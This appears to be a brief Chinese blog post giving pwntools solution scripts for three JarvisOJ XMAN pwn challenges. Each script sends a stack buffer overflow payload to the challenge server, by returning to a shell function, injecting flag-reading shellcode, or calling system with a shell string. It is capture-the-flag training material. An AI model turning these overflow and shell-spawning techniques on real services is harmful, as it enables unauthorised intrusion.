[XMAN]level0-level2

0

JarvisOJ [XMAN] level0, level1, level2 三道pwn题。

level0

from pwn import *
 
context.os = 'linux'
context.arch = 'amd64'
 
r = remote('pwn2.jarvisoj.com', 9881)
 
buf = cyclic(0x80)
fake_ebp = cyclic(8)
callsystem_addr = 0x0000000000400596
 
payload = buf + fake_ebp + p64(callsystem_addr)
r.send(payload)
 
r.interactive()

level1

from pwn import *
 
context.os = 'linux'
context.arch = 'i386'
 
r = remote('pwn2.jarvisoj.com', 9877)
 
r.recvuntil(':')
address = r.recvuntil('?', drop = True)
address = int(address, 16)
 
buf = cyclic(0x88)
fake_ebp = cyclic(4)
ret_addr = address + 0x88 + 4 + 4
shellcode = asm(shellcraft.i386.linux.cat('flag'))
 
payload = buf + fake_ebp + p32(ret_addr) + shellcode
r.send(payload)
 
print r.recvall()
r.close()

level2

from pwn import *
 
context.os = 'linux'
context.arch = 'i386'
 
r = remote('pwn2.jarvisoj.com', 9878)
 
buf = cyclic(0x88)
fake_ebp = cyclic(4)
system_addr = 0x08048320
shell_addr = 0x0804A024
 
payload = buf + fake_ebp + p32(system_addr) + fake_ebp + p32(shell_addr)
r.send(payload)
 
r.interactive()

Leave A Reply

苏ICP备16066660号-1

苏公网安备 32011502010432号